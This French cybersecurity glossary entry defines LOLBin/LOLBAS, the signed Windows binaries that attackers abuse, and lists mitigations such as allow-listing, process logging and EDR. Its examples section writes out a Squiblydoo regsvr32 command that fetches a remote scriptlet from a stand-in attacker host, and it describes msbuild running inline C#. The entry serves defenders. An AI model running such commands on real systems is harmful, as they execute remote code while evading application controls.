LOLBin / LOLBAS
Qu'est-ce que LOLBin / LOLBAS ?
LOLBin / LOLBASBinaire ou script natif et signe (LOLBin/LOLBAS) detourne par les attaquants pour executer du code, telecharger un payload, persister ou contourner des controles sous l'apparence d'un outil d'administration legitime.
Le LOLBin (Living-Off-the-Land Binary) et le projet plus large LOLBAS (Living-Off-the-Land Binaries And Scripts) repertorient les binaires, scripts et bibliotheques signes par Microsoft dont des effets secondaires sont exploitables a des fins offensives: executer du code arbitraire, telecharger des payloads, contourner le controle d'applications. Les exemples courants incluent rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe et certutil.exe. Comme chaque outil est signe et de confiance, les defenseurs ne peuvent pas se contenter de bloquer par hash et doivent distinguer les lignes de commande attendues des anormales. Les LOLBAS supportent de nombreuses techniques d'execution et d'evasion du MITRE ATT&CK. Les mitigations reposent sur l'application control en allow-listing, les logs de ScriptBlock et de creation de processus, les regles ASR et l'analytique comportementale EDR.
● Exemples
- 01
regsvr32.exe /s /n /u /i:http://attacker.example/sct.sct scrobj.dll (Squiblydoo).
- 02
msbuild.exe payload.xml pour executer du C# inline sans toucher au disque.
● Questions fréquentes
Qu'est-ce que LOLBin / LOLBAS ?
Binaire ou script natif et signe (LOLBin/LOLBAS) detourne par les attaquants pour executer du code, telecharger un payload, persister ou contourner des controles sous l'apparence d'un outil d'administration legitime. Cette notion relève de la catégorie Attaques et menaces en cybersécurité.
Que signifie LOLBin / LOLBAS ?
Binaire ou script natif et signe (LOLBin/LOLBAS) detourne par les attaquants pour executer du code, telecharger un payload, persister ou contourner des controles sous l'apparence d'un outil d'administration legitime.
Comment fonctionne LOLBin / LOLBAS ?
Le LOLBin (Living-Off-the-Land Binary) et le projet plus large LOLBAS (Living-Off-the-Land Binaries And Scripts) repertorient les binaires, scripts et bibliotheques signes par Microsoft dont des effets secondaires sont exploitables a des fins offensives: executer du code arbitraire, telecharger des payloads, contourner le controle d'applications. Les exemples courants incluent rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe et certutil.exe. Comme chaque outil est signe et de confiance, les defenseurs ne peuvent pas se contenter de bloquer par hash et doivent distinguer les lignes de commande attendues des anormales. Les LOLBAS supportent de nombreuses techniques d'execution et d'evasion du MITRE ATT&CK. Les mitigations reposent sur l'application control en allow-listing, les logs de ScriptBlock et de creation de processus, les regles ASR et l'analytique comportementale EDR.
Comment se défendre contre LOLBin / LOLBAS ?
Les défenses contre LOLBin / LOLBAS combinent habituellement des contrôles techniques et des pratiques opérationnelles, comme détaillé dans la définition ci-dessus.
Quels sont les autres noms de LOLBin / LOLBAS ?
Noms alternatifs courants : LOLBAS, Binaire Living-off-the-Land.
● Termes liés
- attacks№ 616
Living off the Land
Style operatoire ou l'attaquant abuse d'outils et de scripts legitimes deja installes sur le systeme cible au lieu de deposer son propre malware.
- malware№ 417
Malware sans fichier
Logiciel malveillant qui s'exécute principalement en mémoire et exploite des outils système légitimes, en évitant les exécutables traditionnels sur disque.
- defense-ops№ 298
Évasion défensive
Tactique MITRE ATT&CK (TA0005) couvrant les techniques utilisées pour échapper à la détection, neutraliser les outils de sécurité et masquer l'activité de l'attaquant.
- defense-ops№ 371
EDR (Endpoint Detection and Response)
Technologie de sécurité d'endpoint qui enregistre en continu l'activité des processus, fichiers, registre et réseau pour détecter, analyser et répondre aux menaces sur les machines.
- defense-ops№ 682
Mimikatz
Outil open source de post-exploitation Windows qui extrait mots de passe en clair, hash, tickets Kerberos et autres identifiants depuis la memoire et LSASS.
- attacks№ 045
Bypass d'AMSI
Techniques qui desactivent, patchent ou contournent l'Antimalware Scan Interface de Windows afin que scripts et payloads en memoire ne soient pas analyses par les antivirus.